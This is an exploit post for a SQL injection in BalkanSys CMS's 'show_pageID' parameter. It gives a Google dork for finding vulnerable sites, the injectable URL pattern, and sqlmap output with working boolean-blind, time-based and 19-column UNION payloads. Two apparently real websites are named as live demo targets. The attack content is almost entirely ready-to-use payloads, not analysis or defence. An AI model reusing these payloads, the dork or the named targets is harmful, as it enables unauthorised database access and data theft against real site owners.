Home / os / blackberry
BalkanSys CMS show_pageID SQL injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>BalkanSys CMS show_pageID SQL injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : BalkanSys CMS show_pageID SQL injection # Exploit Author : xBADGIRL21 # Dork : inurl:/?act=show_page or inurl:/?act=show_page "Balkansys" # Category: [ Webapps ] # version: BalkanSys CMS 2.x - 3.x # Tested on: [ Linux | Windows ] # Vendore : http://balkansys.com/ # skype:xbadgirl21 # Date: 2016/07/07 # video Proof : https://youtu.be/pdLAMA2bBrQ ###################### # PoC: # http://www.site.com/?act=show_page&id=[SQLi] ###################### + test:=> http://www.site.com/?act=show_page&id=[76] INJECT HERE # respone:==> # [09:39:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' " injectable " # Parameter: id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: act=show_page&id=76' AND 9301=9301 AND 'thUL'='thUL # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (SELECT) # Payload: act=show_page&id=76' AND (SELECT * FROM (SELECT(SLEEP(5)))oZvn) AND 'ysNR'='ysNR # # Type: UNION query # Title: Generic UNION query (NULL) - 19 columns # Payload: act=show_page&id=-8914' UNION ALL SELECT #NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627671,0x4d4b6d63774a4d4e546c,0x717a786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- + Demo + http://optela.com/?act=show_page&id=76 + http://saturaad.com/?act=show_page&id=165 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ####################### </BODY></HTML>